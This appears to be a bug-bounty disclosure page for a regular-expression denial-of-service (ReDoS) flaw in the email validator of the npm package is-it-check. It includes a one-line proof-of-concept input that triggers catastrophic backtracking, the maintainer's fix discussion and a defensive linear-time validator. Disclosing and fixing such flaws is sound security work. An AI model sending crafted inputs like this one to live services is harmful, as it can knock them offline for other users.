ReDoS in is-it-check in evdama/is-it-check

Valid

Reported on Mar 19th 2022


✍️ Description

The email check in is-it-check allows a denial of service (regular-expression denial of service, ReDoS) when it validates crafted invalid email strings: a malicious input makes the email regex backtrack for a very long time.

🕵️‍♂️ Proof of Concept

// PoC.js
var isItCheck = require("is-it-check")
// Crafted invalid address from the report; the email regex backtracks on it for a long time.
isItCheck.email('_@A.'+ '0.0.'.repeat(40)+'~A')

We are processing your report and will contact the evdama/is-it-check team within 24 hours. a year ago
We have contacted a member of the evdama/is-it-check team and are waiting to hear back a year ago
Markus (Maintainer), a year ago

Same as for the is.url() check... Two possible solutions: a) add a str.length() check or b) modify the existing regex with a length check. Would you mind sending a PR to https://github.com/evdama/is-it-check ?

Markus (Maintainer), a year ago

I opted for b): https://github.com/evdama/is.js/commit/74b01444421525d636dabb47d4e72b23fd58a152
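To make the two mitigation options discussed above concrete, the following is an added example (written for this page, not code from the report, from is-it-check or from the linked commit). It applies the length bound of option a) and then validates the address with a single-pass walk that has no nested quantifiers to backtrack into; the accepted shape (local@label.label[.label...]), the character classes and the 254-character cap are assumptions chosen for illustration.

```javascript
// Added example, not code from the report or from is-it-check. It shows the
// defensive shape of the maintainer's option (a): bound the input length
// first, then validate with logic that cannot backtrack. The accepted form
// (local@label.label[.label...]) and the 254-char cap are assumptions.
const MAX_EMAIL_LENGTH = 254; // assumed cap; pick one that fits your system

// Single-character class tests; a one-char match can never backtrack.
const isLocalChar = (ch) => /^[A-Za-z0-9!#$%&'*+\/=?^_`{|}~-]$/.test(ch);
const isLabelChar = (ch) => /^[A-Za-z0-9-]$/.test(ch);

// Walk the dot-separated parts of `str` once: every part non-empty (so no
// leading, trailing or doubled dots), every char accepted by `okChar`, and
// for domain labels no leading or trailing '-'. With `needTld`, at least two
// parts are required. O(n) in the input length.
function checkParts(str, okChar, needTld) {
  let partLen = 0;
  let parts = 0;
  for (let i = 0; i < str.length; i++) {
    const ch = str[i];
    if (ch === '.') {
      if (partLen === 0) return false;
      parts++;
      partLen = 0;
    } else {
      if (!okChar(ch)) return false;
      if (needTld && ch === '-' && (partLen === 0 || i + 1 === str.length || str[i + 1] === '.')) return false;
      partLen++;
    }
  }
  if (partLen === 0) return false;
  parts++;
  return needTld ? parts >= 2 : true;
}

// Syntax check for local@domain. Rejects over-long input before any other
// work, so cost is bounded by MAX_EMAIL_LENGTH and linear in the input.
function isEmailSyntax(s) {
  if (typeof s !== 'string' || s.length === 0 || s.length > MAX_EMAIL_LENGTH) return false;
  const at = s.indexOf('@');
  if (at <= 0 || at !== s.lastIndexOf('@') || at === s.length - 1) return false;
  return checkParts(s.slice(0, at), isLocalChar, false) &&
         checkParts(s.slice(at + 1), isLabelChar, true);
}

// The report's PoC input, rebuilt here: 166 characters, so a 254-char cap
// alone would not stop it; the single-pass walk rejects it at the '~'.
const POC_INPUT = '_@A.' + '0.0.'.repeat(40) + '~A';
console.log(POC_INPUT.length, isEmailSyntax(POC_INPUT)); // 166 false
```

Note that the PoC string is well under a typical 254-character cap, so a length bound on its own (option a) only limits how long the backtracking can run; removing the ambiguity from the matching logic is what makes the check linear.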

Markus validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus marked this as fixed in 1.0.0 with commit 74b014 a year ago
Markus has been awarded the fix bounty
This vulnerability will not receive a CVE